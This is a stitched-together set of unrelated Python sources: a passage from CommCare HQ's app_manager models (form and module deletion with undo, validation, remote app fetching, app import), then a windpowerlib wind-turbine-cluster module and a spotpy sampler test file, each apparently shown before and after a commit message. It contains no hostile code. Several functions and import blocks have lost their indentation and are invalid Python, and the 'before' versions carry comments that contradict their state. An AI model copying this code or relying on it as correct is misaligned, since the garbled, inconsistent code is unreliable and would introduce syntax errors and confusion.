    """Remove a module, saving a DeleteModuleRecord so the deletion can be
    undone. Returns None when the module doesn't exist."""
    try:
        module = self.get_module_by_unique_id(module_unique_id)
    except ModuleNotFoundException:
        return None
    undo_record = DeleteModuleRecord(
        datetime=datetime.datetime.utcnow(),
        domain=self.domain,
        app_id=self.id,
        module_id=module.id,
        module=module,
    )
    del self.modules[module.id]
    undo_record.save()
    return undo_record
def new_form(self, module_id, name, lang, attachment=""):
    """Create a new form in the given module and return it."""
    return self.get_module(module_id).new_form(name, lang, attachment)
def delete_form(self, module_unique_id, form_unique_id):
    """Remove a form, saving a DeleteFormRecord for undo first.

    Returns None when the module or form doesn't exist. Note the undo
    record is saved before pre_delete_hook runs and before the form is
    removed, so the record captures the pre-deletion state.
    """
    try:
        module = self.get_module_by_unique_id(module_unique_id)
        form = self.get_form(form_unique_id)
    except (ModuleNotFoundException, FormNotFoundException):
        return None

    record = DeleteFormRecord(
        domain=self.domain,
        app_id=self.id,
        module_unique_id=module_unique_id,
        form_id=form.id,
        form=form,
        datetime=datetime.datetime.utcnow(),
    )
    record.save()

    try:
        form.pre_delete_hook()
    except NotImplementedError:
        # Forms without a pre-delete hook are fine.
        pass

    del module['forms'][form.id]
    return record
def rename_lang(self, old_lang, new_lang):
    """Rename a language code throughout the app: langs list, build
    profiles, each module, and the translations dict.

    Raises ValueError for an invalid code and AppEditingError when the
    target language already exists.
    """
    validate_lang(new_lang)
    if old_lang == new_lang:
        return
    if new_lang in self.langs:
        raise AppEditingError("Language %s already exists!" % new_lang)
    for i, lang in enumerate(self.langs):
        if lang == old_lang:
            self.langs[i] = new_lang
    # NOTE(review): this iterates self.build_profiles directly and reads
    # .langs off each item — confirm iteration yields profile objects
    # rather than keys.
    for profile in self.build_profiles:
        for i, lang in enumerate(profile.langs):
            if lang == old_lang:
                profile.langs[i] = new_lang
    for module in self.get_modules():
        module.rename_lang(old_lang, new_lang)
    _rename_key(self.translations, old_lang, new_lang)
def rearrange_modules(self, i, j):
    """Move the module at index j to index i; raises RearrangeError when
    an index is out of range."""
    modules = self.modules
    try:
        moved = modules.pop(j)
    except IndexError:
        raise RearrangeError()
    modules.insert(i, moved)
    self.modules = modules
def rearrange_forms(self, to_module_id, from_module_id, i, j):
    """
    The case type of the two modules conflict,
    ConflictingCaseTypeError is raised,
    but the rearrangement (confusingly) goes through anyway.
    This is intentional.
    """
    to_module = self.get_module(to_module_id)
    from_module = self.get_module(from_module_id)
    try:
        from_module.forms[j].pre_move_hook(from_module, to_module)
    except NotImplementedError:
        # Forms without a pre-move hook are fine.
        pass
    try:
        form = from_module.forms.pop(j)
        to_module.add_insert_form(from_module, form, index=i, with_source=True)
    except IndexError:
        raise RearrangeError()
    # Raised AFTER the move on purpose — see docstring.
    if to_module.case_type != from_module.case_type:
        raise ConflictingCaseTypeError()
def scrub_source(self, source):
    """Return app source with all unique ids regenerated (for copy/import)."""
    return update_unique_ids(source)
def copy_form(self, module_id, form_id, to_module_id):
    """
    The case type of the two modules conflict,
    ConflictingCaseTypeError is raised,
    but the copying (confusingly) goes through anyway.
    This is intentional.
    """
    source_module = self.get_module(module_id)
    target_module = self.get_module(to_module_id)
    form = source_module.get_form(form_id)
    self._copy_form(source_module, form, target_module, rename=True)
def _copy_form(self, from_module, form, to_module, *args, **kwargs):
    """Copy `form` into `to_module`, optionally renaming it 'Copy of ...'
    per language. Raises BlankXFormError for forms without source, and
    ConflictingCaseTypeError AFTER copying when case types differ."""
    if not form.source:
        raise BlankXFormError()

    copy_source = deepcopy(form.to_json())
    # A fresh unique_id will be assigned when the copy is wrapped.
    if 'unique_id' in copy_source:
        del copy_source['unique_id']

    if 'rename' in kwargs and kwargs['rename']:
        for lang, name in copy_source['name'].iteritems():
            with override(lang):
                # Localized "Copy of {name}" per app language.
                copy_source['name'][lang] = _('Copy of {name}').format(name=name)

    copy_form = to_module.add_insert_form(from_module, FormBase.wrap(copy_source))
    save_xform(self, copy_form, form.source)

    # Intentionally raised after the copy has been made (see copy_form).
    if from_module['case_type'] != to_module['case_type']:
        raise ConflictingCaseTypeError()
@cached_property
def has_case_management(self):
    """True when any form in the app defines case actions."""
    return any(
        form.active_actions()
        for module in self.get_modules()
        for form in module.get_forms()
    )
@memoized
def case_type_exists(self, case_type):
    """Whether the given case type is used anywhere in the app."""
    return case_type in self.get_case_types()
@memoized
def get_case_types(self):
    """All case types used across the app's modules, plus the usercase
    type when the domain has it enabled."""
    case_types = set()
    for module in self.get_modules():
        case_types.update(module.get_case_types())
    if is_usercase_in_use(self.domain):
        case_types.add(USERCASE_TYPE)
    return case_types
def has_media(self):
    """Whether the app references any multimedia."""
    return len(self.multimedia_map) > 0
@memoized
def get_xmlns_map(self):
    """Map each xmlns to the list of forms declaring it.

    Returns a defaultdict(list) on purpose: callers index missing keys
    and expect an empty list.
    """
    by_xmlns = defaultdict(list)
    for form in self.get_forms():
        by_xmlns[form.xmlns].append(form)
    return by_xmlns
def get_form_by_xmlns(self, xmlns, log_missing=True):
    """Return the single form with this xmlns, or None. Device reports are
    ignored; zero or multiple matches are logged (unless log_missing is
    False and there are zero)."""
    if xmlns == "http://code.javarosa.org/devicereport":
        return None
    forms = self.get_xmlns_map()[xmlns]
    if len(forms) == 1:
        return forms[0]
    if log_missing or len(forms) > 1:
        logging.error('App %s in domain %s has %s forms with xmlns %s' % (
            self.get_id,
            self.domain,
            len(forms),
            xmlns,
        ))
    return None
def get_questions(self, xmlns):
    """Questions of the form with this xmlns, or [] when no such form."""
    form = self.get_form_by_xmlns(xmlns)
    return form.get_questions(self.langs) if form else []
def check_subscription(self):
    """Return subscription-related errors (currently: usercase usage
    without the USER_CASE privilege)."""
    errors = []
    uses_usercase = any(m.uses_usercase() for m in self.get_modules())
    if uses_usercase and not domain_has_privilege(self.domain, privileges.USER_CASE):
        errors.append({
            'type': 'subscription',
            'message': _('Your application is using User Case functionality. You can remove User Case '
                         'functionality by opening the User Case Management tab in a form that uses it, and '
                         'clicking "Remove User Case Properties".')
        })
    return errors
def validate_app(self):
    """Application-specific build validation: languages, modules, forms,
    duplicate xmlns, dependency cycles, and subscription checks. Falls
    back to the base-class validation only when no errors were found."""
    xmlns_count = defaultdict(int)
    errors = []

    for lang in self.langs:
        if not lang:
            errors.append({'type': 'empty lang'})

    if not self.modules:
        errors.append({'type': "no modules"})
    for module in self.get_modules():
        errors.extend(module.validate_for_build())

    for form in self.get_forms():
        errors.extend(form.validate_for_build(validate_module=False))

        # make sure that there aren't duplicate xmlns's
        xmlns_count[form.xmlns] += 1
    for xmlns in xmlns_count:
        if xmlns_count[xmlns] > 1:
            errors.append({'type': "duplicate xmlns", "xmlns": xmlns})

    if any(not module.unique_id for module in self.get_modules()):
        raise ModuleIdMissingException
    modules_dict = {m.unique_id: m for m in self.get_modules()}

    def _parent_select_fn(module):
        # Neighbour function for cycle detection over parent-select links.
        if hasattr(module, 'parent_select') and module.parent_select.active:
            return module.parent_select.module_id

    if self._has_dependency_cycle(modules_dict, _parent_select_fn):
        errors.append({'type': 'parent cycle'})

    errors.extend(self._child_module_errors(modules_dict))
    errors.extend(self.check_subscription())

    # Only run the expensive base validation (full file generation) when
    # nothing above failed.
    if not errors:
        errors = super(Application, self).validate_app()
    return errors
def _has_dependency_cycle(self, modules, neighbour_id_fn):
"""
Detect dependency cycles given modules and the neighbour_id_fn
:param modules: A mapping of module unique_ids to Module objects
:neighbour_id_fn: function to get the neibour module unique_id
:return: True if there is a cycle in the module relationship graph
"""
visited = set()
completed = set()
def cycle_helper(m):
if m.id in visited:
if m.id in completed:
return False
return True
visited.add(m.id)
parent = modules.get(neighbour_id_fn(m), None)
if parent is not None and cycle_helper(parent):
return True
completed.add(m.id)
return False
for module in modules.values():
if cycle_helper(module):
return True
return False
def _child_module_errors(self, modules_dict):
    """
    Validate the parent/child (root_module_id) module graph.

    Returns error dicts for cycles in root_module_id links and for
    root_module_id values that reference modules not in this app.
    """
    module_errors = []

    def _root_module_fn(module):
        # Neighbour function over root_module_id links; returns None
        # (implicitly) for modules without a root_module_id attribute.
        if hasattr(module, 'root_module_id'):
            return module.root_module_id

    if self._has_dependency_cycle(modules_dict, _root_module_fn):
        module_errors.append({'type': 'root cycle'})
    module_ids = set([m.unique_id for m in self.get_modules()])
    root_ids = set([_root_module_fn(m) for m in self.get_modules() if _root_module_fn(m) is not None])
    if not root_ids.issubset(module_ids):
        module_errors.append({'type': 'unknown root'})
    return module_errors
def get_profile_setting(self, s_type, s_id):
    """
    Resolve a profile setting value for this app.

    Resolution order: the value stored on the app's profile, then the
    last matching "contingent_default" condition from the commcare
    settings YAML, then the "disabled_default" when the app's build
    version predates the setting's "since" version, and finally the
    YAML "default".
    """
    setting = self.profile.get(s_type, {}).get(s_id)
    if setting is not None:
        return setting
    yaml_setting = commcare_settings.get_commcare_settings_lookup()[s_type][s_id]
    for contingent in yaml_setting.get("contingent_default", []):
        if check_condition(self, contingent["condition"]):
            setting = contingent["value"]
    if setting is not None:
        return setting
    # NOTE(review): build_version is compared against the YAML "since"
    # string — presumably both are comparable version values; confirm.
    if self.build_version < yaml_setting.get("since", "0"):
        setting = yaml_setting.get("disabled_default", None)
        if setting is not None:
            return setting
    return yaml_setting.get("default")
@property
def has_careplan_module(self):
    """Whether any module of this app is a CareplanModule."""
    return any(isinstance(m, CareplanModule) for m in self.modules)
@quickcache(['self.version'])
def get_case_metadata(self):
    """
    Build an AppCaseMetadata summary for this app, cached per app version.

    Collects parent/child case-type relationships, lets every form
    contribute its case properties, then derives a case-type hierarchy
    rooted at types with no relationships.  Types never reached while
    walking from a root are flagged with an error.
    """
    from corehq.apps.reports.formdetails.readable import AppCaseMetadata
    builder = ParentCasePropertyBuilder(self)
    case_relationships = builder.get_parent_type_map(self.get_case_types())
    meta = AppCaseMetadata()
    for case_type, relationships in case_relationships.items():
        type_meta = meta.get_type(case_type)
        type_meta.relationships = relationships
    for module in self.get_modules():
        for form in module.get_forms():
            form.update_app_case_meta(meta)
    # Records every case type visited while building the hierarchy.
    seen_types = []

    def get_children(case_type):
        seen_types.append(case_type)
        return [type_.name for type_ in meta.case_types if type_.relationships.get('parent') == case_type]

    def get_hierarchy(case_type):
        return {child: get_hierarchy(child) for child in get_children(case_type)}

    roots = [type_ for type_ in meta.case_types if not type_.relationships]
    for type_ in roots:
        meta.type_hierarchy[type_.name] = get_hierarchy(type_.name)
    for type_ in meta.case_types:
        if type_.name not in seen_types:
            # Not reachable from any root: mark the hierarchy as broken.
            meta.type_hierarchy[type_.name] = {}
            type_.error = _("Error in case type hierarchy")
    return meta
def get_subcase_types(self, case_type):
    """
    Return the subcase types defined across an app for the given case type
    """
    subcase_types = set()
    for module in self.get_modules():
        if module.case_type == case_type:
            subcase_types.update(module.get_subcase_types())
    return subcase_types
class RemoteApp(ApplicationBase):
    """
    A wrapper for a url pointing to a suite or profile file. This allows you to
    write all the files for an app by hand, and then give the url to app_manager
    and let it package everything together for you.
    """
    profile_url = StringProperty(default="http://")
    name = StringProperty()
    manage_urls = BooleanProperty(default=False)
    # Lazily built cache of {xmlns: questions}; see make_questions_map.
    questions_map = DictProperty(required=False)

    def is_remote_app(self):
        # Distinguishes RemoteApp from locally built Applications at runtime.
        return True

    @classmethod
    def new_app(cls, domain, name, lang='en'):
        """Create a new, unsaved RemoteApp with a single language."""
        app = cls(domain=domain, name=name, langs=[lang])
        return app

    def create_profile(self, is_odk=False, langs=None):
        """Render the remote profile; the is_odk flag is currently ignored."""
        # we don't do odk for now anyway
        return remote_app.make_remote_profile(self, langs)

    def strip_location(self, location):
        # Normalize a resource location relative to this app's profile_url.
        return remote_app.strip_location(self.profile_url, location)

    def fetch_file(self, location):
        """
        Download a resource relative to profile_url.

        :return: (stripped location, raw content)
        :raises AppEditingError: if the url cannot be fetched
        """
        location = self.strip_location(location)
        url = urljoin(self.profile_url, location)
        try:
            content = urlopen(url).read()
        except Exception:
            raise AppEditingError('Unable to access resource url: "%s"' % url)
        return location, content

    def get_build_langs(self):
        """
        Return the list of languages to build with.

        Remote apps support at most one build profile; with none present
        the app's own langs are used.
        """
        if self.build_profiles:
            if len(self.build_profiles.keys()) > 1:
                raise AppEditingError('More than one app profile for a remote app')
            else:
                # return first profile, generated as part of lazy migration
                # NOTE(review): keys()[0] only works on Python 2 dict-likes.
                return self.build_profiles[self.build_profiles.keys()[0]].langs
        else:
            return self.langs

    @classmethod
    def get_locations(cls, suite):
        """Yield (resource tag, location) pairs from a parsed suite doc."""
        for resource in suite.findall('*/resource'):
            try:
                loc = resource.findtext('location[@authority="local"]')
            except Exception:
                loc = resource.findtext('location[@authority="remote"]')
            yield resource.getparent().tag, loc

    @property
    def SUITE_XPATH(self):
        # XPath to the suite's local location inside the profile document.
        return 'suite/resource/location[@authority="local"]'

    def create_all_files(self, build_profile_id=None):
        """
        Assemble {path: content} for every file of the remote app.

        Fetches the profile, the suite(s) it references, and every resource
        those suites reference; xforms are pruned to the build languages.
        """
        langs_for_build = self.get_build_langs()
        files = {
            'profile.xml': self.create_profile(langs=langs_for_build),
        }
        tree = _parse_xml(files['profile.xml'])

        def add_file_from_path(path, strict=False, transform=None):
            # Fetch every location matched by *path*, optionally transforming
            # the content, and record it in *files*.
            added_files = []
            # must find at least one
            try:
                tree.find(path).text
            except (TypeError, AttributeError):
                if strict:
                    raise AppEditingError("problem with file path reference!")
                else:
                    return
            for loc_node in tree.findall(path):
                loc, file = self.fetch_file(loc_node.text)
                if transform:
                    file = transform(file)
                files[loc] = file
                added_files.append(file)
            return added_files

        add_file_from_path('features/users/logo')
        try:
            suites = add_file_from_path(
                self.SUITE_XPATH,
                strict=True,
                transform=(lambda suite:
                           remote_app.make_remote_suite(self, suite))
            )
        except AppEditingError:
            raise AppEditingError(ugettext('Problem loading suite file from profile file. Is your profile file correct?'))
        for suite in suites:
            suite_xml = _parse_xml(suite)
            for tag, location in self.get_locations(suite_xml):
                location, data = self.fetch_file(location)
                if tag == 'xform' and langs_for_build:
                    try:
                        xform = XForm(data)
                    except XFormException as e:
                        raise XFormException('In file %s: %s' % (location, e))
                    xform.exclude_languages(whitelist=langs_for_build)
                    data = xform.render()
                files.update({location: data})
        return files

    def make_questions_map(self):
        """
        Build {xmlns: questions} from this (saved) app's attachments.

        Returns None when the app is not a copy (no saved attachments yet).
        """
        langs_for_build = self.get_build_langs()
        if self.copy_of:
            xmlns_map = {}

            def fetch(location):
                # Read a previously saved attachment rather than the network.
                filepath = self.strip_location(location)
                return self.fetch_attachment('files/%s' % filepath)

            profile_xml = _parse_xml(fetch('profile.xml'))
            suite_location = profile_xml.find(self.SUITE_XPATH).text
            suite_xml = _parse_xml(fetch(suite_location))
            for tag, location in self.get_locations(suite_xml):
                if tag == 'xform':
                    xform = XForm(fetch(location))
                    xmlns = xform.data_node.tag_xmlns
                    questions = xform.get_questions(langs_for_build)
                    xmlns_map[xmlns] = questions
            return xmlns_map
        else:
            return None

    def get_questions(self, xmlns):
        """Return (and lazily cache on the doc) the questions for *xmlns*."""
        if not self.questions_map:
            self.questions_map = self.make_questions_map()
            if not self.questions_map:
                return []
            # Persist the freshly built map so later calls skip the rebuild.
            self.save()
        questions = self.questions_map.get(xmlns, [])
        return questions
# Map couch doc_type strings (including the soft-deleted variants) to the
# model class used to wrap raw app sources.
str_to_cls = {
    "Application": Application,
    "Application-Deleted": Application,
    "RemoteApp": RemoteApp,
    "RemoteApp-Deleted": RemoteApp,
}
def import_app(app_id_or_source, domain, source_properties=None, validate_source_domain=None):
    """
    Copy an app (given by id or as an exported source dict) into *domain*.

    :param app_id_or_source: app id string, or a raw app source dict
    :param domain: target domain name
    :param source_properties: optional key/value overrides applied to the
        source document before wrapping
    :param validate_source_domain: optional callback given the source
        domain name; may raise to forbid importing from it
    :return: the newly created, saved app
    """
    if isinstance(app_id_or_source, basestring):
        app_id = app_id_or_source
        source = get_app(None, app_id)
        src_dom = source['domain']
        if validate_source_domain:
            validate_source_domain(src_dom)
        source = source.export_json()
        source = json.loads(source)
    else:
        cls = str_to_cls[app_id_or_source['doc_type']]
        # Don't modify original app source
        app = cls.wrap(deepcopy(app_id_or_source))
        source = app.export_json(dump_json=False)
    try:
        attachments = source['_attachments']
    except KeyError:
        attachments = {}
    finally:
        # Attachments are re-added below inside atomic_blobs.
        source['_attachments'] = {}
    if source_properties is not None:
        for key, value in source_properties.iteritems():
            source[key] = value
    cls = str_to_cls[source['doc_type']]
    # Allow the wrapper to update to the current default build_spec
    if 'build_spec' in source:
        del source['build_spec']
    app = cls.from_source(source, domain)
    app.cloudcare_enabled = domain_has_privilege(domain, privileges.CLOUDCARE)
    with app.atomic_blobs():
        for name, attachment in attachments.items():
            if re.match(ATTACHMENT_REGEX, name):
                app.put_attachment(attachment, name)
    if not app.is_remote_app():
        # Make the target domain valid for each of the app's media items.
        for _, m in app.get_media_objects():
            if domain not in m.valid_domains:
                m.valid_domains.append(domain)
                m.save()
    if not app.is_remote_app() and any(module.uses_usercase() for module in app.get_modules()):
        # Importing an app that uses the user case enables it on the domain.
        from corehq.apps.app_manager.util import enable_usercase
        enable_usercase(domain)
    return app
class DeleteApplicationRecord(DeleteRecord):
    # Tombstone that can restore a soft-deleted application.
    app_id = StringProperty()

    def undo(self):
        """Restore the deleted app by resetting its doc_type."""
        app = ApplicationBase.get(self.app_id)
        app.doc_type = app.get_doc_type()
        app.save(increment_version=False)
class DeleteModuleRecord(DeleteRecord):
    # Tombstone that can restore a deleted module at its old index.
    app_id = StringProperty()
    module_id = IntegerProperty()
    module = SchemaProperty(ModuleBase)

    def undo(self):
        """Re-insert the saved module into the app at its original index."""
        app = Application.get(self.app_id)
        modules = app.modules
        modules.insert(self.module_id, self.module)
        app.modules = modules
        app.save()
class DeleteFormRecord(DeleteRecord):
    # Tombstone that can restore a deleted form into its module.
    app_id = StringProperty()
    module_id = IntegerProperty()
    module_unique_id = StringProperty()
    form_id = IntegerProperty()
    form = SchemaProperty(FormBase)

    def undo(self):
        """Re-insert the saved form at its original index in its module.

        Prefers module_unique_id when present; falls back to the module's
        positional index otherwise.
        """
        app = Application.get(self.app_id)
        if self.module_unique_id is not None:
            module = app.get_module_by_unique_id(self.module_unique_id)
        else:
            module = app.modules[self.module_id]
        forms = module.forms
        forms.insert(self.form_id, self.form)
        module.forms = forms
        app.save()
class CareplanAppProperties(DocumentSchema):
    # Careplan configuration for a single app within a domain.
    name = StringProperty()
    latest_release = StringProperty()
    case_type = StringProperty()
    goal_conf = DictProperty()
    task_conf = DictProperty()
class CareplanConfig(Document):
    """Per-domain careplan configuration, holding per-app properties."""
    domain = StringProperty()
    app_configs = SchemaDictProperty(CareplanAppProperties)

    @classmethod
    def for_domain(cls, domain):
        """Return the (cached) CareplanConfig for *domain*, or None."""
        docs = cache_core.cached_view(
            cls.get_db(),
            "by_domain_doc_type_date/view",
            key=[domain, 'CareplanConfig', None],
            reduce=False,
            include_docs=True,
            wrapper=cls.wrap)
        return docs[0] if len(docs) > 0 else None
# backwards compatibility with suite-1.0.xml
# These shims expose id_strings helpers as methods on the legacy model
# classes so that older suite-generation code keeps working unchanged.
FormBase.get_command_id = lambda self: id_strings.form_command(self)
FormBase.get_locale_id = lambda self: id_strings.form_locale(self)
ModuleBase.get_locale_id = lambda self: id_strings.module_locale(self)
ModuleBase.get_case_list_command_id = lambda self: id_strings.case_list_command(self)
ModuleBase.get_case_list_locale_id = lambda self: id_strings.case_list_locale(self)
Module.get_referral_list_command_id = lambda self: id_strings.referral_list_command(self)
Module.get_referral_list_locale_id = lambda self: id_strings.referral_list_locale(self)
|
"""
The ``wind_turbine_cluster`` module is under development and is not working yet.
"""
# TODO: description
__copyright__ = "Copyright oemof developer group"
__license__ = "GPLv3"
import numpy as np
#from windpowerlib import wind_turbine
class WindTurbineCluster(object):
    r"""
    Parameters
    ----------
    object_name : string
        Name of the wind turbine cluster.
    wind_farms : list
        ...
    coordinates : list or None
        List of coordinates [lat, lon] of location for loading data.
        Default: None.

    Attributes
    ----------
    object_name : string
        Name of the wind turbine cluster.
    wind_farms : list
        ...
    coordinates : list or None
        List of coordinates [lat, lon] of location for loading data.
        Default: None.
    hub_height : float
        The calculated average hub height of the wind turbine cluster.
    installed_power : float
        The calculated installed power of the wind turbine cluster.
    power_curve : pandas.DataFrame or None
        The calculated power curve of the wind turbine cluster.
    power_output : pandas.Series
        The calculated power output of the wind turbine cluster.
    """
    def __init__(self, object_name, wind_farms, coordinates=None):
        self.object_name = object_name
        self.wind_farms = wind_farms
        self.coordinates = coordinates

        # Derived attributes, filled in by the calculation methods below.
        self.hub_height = None
        self.installed_power = None
        self.power_curve = None
        self.power_output = None

    def mean_hub_height(self):
        r"""
        Calculates the mean power weighted hub height of the turbine cluster.

        Assigns the hub height to the wind turbine cluster object.

        Returns
        -------
        self

        Notes
        -----
        The following equation is used [1]_:
        .. math:: h_{WF} = e^{\sum\limits_{k}{ln(h_{WT,k})}
                           \frac{P_{N,k}}{\sum\limits_{k}{P_{N,k}}}}

        with:
            :math:`h_{WF}`: mean hub height of wind farm,
            :math:`h_{WT,k}`: hub height of the k-th wind turbine of a wind
            farm, :math:`P_{N,k}`: nominal power of the k-th wind turbine,

        References
        ----------
        .. [1] Knorr, K.: "Modellierung von raum-zeitlichen Eigenschaften der
                 Windenergieeinspeisung für wetterdatenbasierte
                 Windleistungssimulationen". Universität Kassel, Diss., 2016,
                 p. 35
        """
        self.hub_height = np.exp(
            sum(np.log(wind_farm.hub_height) * wind_farm.installed_power for
                wind_farm in self.wind_farms) / self.get_installed_power())
        return self

    def get_installed_power(self):
        r"""
        Calculates the installed power of a wind turbine cluster.

        Previously missing: mean_hub_height() calls this method, which
        raised AttributeError before it was defined.

        Returns
        -------
        float
            Installed power of the wind turbine cluster.
        """
        return sum(wind_farm.installed_power for wind_farm in self.wind_farms)
Add function for installed power of turbine cluster
"""
The ``wind_turbine_cluster`` module is under development and is not working yet.
"""
# TODO: description
__copyright__ = "Copyright oemof developer group"
__license__ = "GPLv3"
import numpy as np
#from windpowerlib import wind_turbine
class WindTurbineCluster(object):
    r"""
    A cluster (group) of wind farms.

    Parameters
    ----------
    object_name : string
        Name of the wind turbine cluster.
    wind_farms : list
        ...
    coordinates : list or None
        List of coordinates [lat, lon] of location for loading data.
        Default: None.

    Attributes
    ----------
    object_name : string
        Name of the wind turbine cluster.
    wind_farms : list
        ...
    coordinates : list or None
        List of coordinates [lat, lon] of location for loading data.
        Default: None.
    hub_height : float
        The calculated average hub height of the wind turbine cluster.
    installed_power : float
        The calculated installed power of the wind turbine cluster.
    power_curve : pandas.DataFrame or None
        The calculated power curve of the wind turbine cluster.
    power_output : pandas.Series
        The calculated power output of the wind turbine cluster.
    """
    def __init__(self, object_name, wind_farms, coordinates=None):
        self.object_name = object_name
        self.wind_farms = wind_farms
        self.coordinates = coordinates
        self.hub_height = None
        self.installed_power = None
        self.power_curve = None
        self.power_output = None

    def mean_hub_height(self):
        r"""
        Calculates the mean power weighted hub height of the turbine cluster.

        Assigns the hub height to the wind turbine cluster object and
        returns ``self``.  Implements the power-weighted logarithmic mean
        from [1]_:

        .. math:: h_{WF} = e^{\sum\limits_{k}{ln(h_{WT,k})}
                           \frac{P_{N,k}}{\sum\limits_{k}{P_{N,k}}}}

        References
        ----------
        .. [1] Knorr, K.: "Modellierung von raum-zeitlichen Eigenschaften der
                 Windenergieeinspeisung für wetterdatenbasierte
                 Windleistungssimulationen". Universität Kassel, Diss., 2016,
                 p. 35
        """
        total_power = self.get_installed_power()
        weighted_log_heights = sum(
            np.log(farm.hub_height) * farm.installed_power
            for farm in self.wind_farms)
        self.hub_height = np.exp(weighted_log_heights / total_power)
        return self

    def get_installed_power(self):
        r"""
        Calculates the installed power of a wind turbine cluster.

        Returns
        -------
        float
            Installed power of the wind turbine cluster.
        """
        return sum(farm.installed_power for farm in self.wind_farms)
|
# -*- coding: utf-8 -*-
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the example code from the Rosenbrock tutorial web-documentation.
'''
import unittest
try:
import spotpy
except ImportError:
import sys
sys.path.append(".")
import spotpy
import numpy as np
from spotpy.examples.spot_setup_rosenbrock import spot_setup
from spotpy.describe import describe
#https://docs.python.org/3/library/unittest.html
class TestAlgorithms(unittest.TestCase):
    """Smoke tests: run every spotpy sampler on the Rosenbrock setup."""

    def setUp(self):
        # These attributes were previously assigned to ``self`` directly in
        # the class body, which raises NameError at class-creation time;
        # per-test state belongs in setUp().
        # How many digits to match in case of floating point answers
        self.tolerance = 7
        # Create samplers for every algorithm:
        self.spot_setup = spot_setup()
        self.rep = 1000
        self.timeout = 10  # Given in Seconds
        self.parallel = "seq"
        self.dbformat = "csv"

    def test_mc(self):
        sampler = spotpy.algorithms.mc(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_lhs(self):
        sampler = spotpy.algorithms.lhs(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_mle(self):
        sampler = spotpy.algorithms.mle(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_mcmc(self):
        sampler = spotpy.algorithms.mcmc(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_demcz(self):
        sampler = spotpy.algorithms.demcz(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_dream(self):
        # Was passing the spot_setup *class* instead of the configured
        # instance created in setUp().
        sampler = spotpy.algorithms.dream(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_sceua(self):
        sampler = spotpy.algorithms.sceua(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_abc(self):
        sampler = spotpy.algorithms.abc(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_fscabc(self):
        sampler = spotpy.algorithms.fscabc(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_rope(self):
        sampler = spotpy.algorithms.rope(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_sa(self):
        sampler = spotpy.algorithms.sa(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_list(self):
        sampler = spotpy.algorithms.list(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_fast(self):
        sampler = spotpy.algorithms.fast(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), 2, self.tolerance)  # Si values should be returned

    @classmethod
    def tearDownClass(cls):
        # Remove the shared database file written by the samplers.
        import os  # os was never imported at module level
        try:
            os.remove("Rosen.csv")
        except FileNotFoundError:
            pass
if __name__ == '__main__':
    # exit=False lets the interpreter continue after the test run.
    unittest.main(exit=False)
Implement use of __init__ in test class
# -*- coding: utf-8 -*-
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the example code from the Rosenbrock tutorial web-documentation.
'''
import unittest
try:
import spotpy
except ImportError:
import sys
sys.path.append(".")
import spotpy
import numpy as np
from spotpy.examples.spot_setup_rosenbrock import spot_setup
from spotpy.describe import describe
#https://docs.python.org/3/library/unittest.html
class TestAlgorithms(unittest.TestCase):
    """Smoke tests: run every spotpy sampler on the Rosenbrock setup."""

    def __init__(self, *args, **kwargs):
        # unittest instantiates each test as TestCase(methodName); the
        # previous zero-argument __init__ broke that and never called
        # super().__init__().
        super(TestAlgorithms, self).__init__(*args, **kwargs)
        # How many digits to match in case of floating point answers
        self.tolerance = 7
        # Create samplers for every algorithm:
        self.spot_setup = spot_setup()
        self.rep = 1000
        self.timeout = 10  # Given in Seconds
        self.parallel = "seq"
        self.dbformat = "csv"

    def test_mc(self):
        sampler = spotpy.algorithms.mc(self.spot_setup, parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
        results = sampler.sample(self.rep)
        self.assertAlmostEqual(len(results), self.rep, self.tolerance)

    def test_lhs(self):
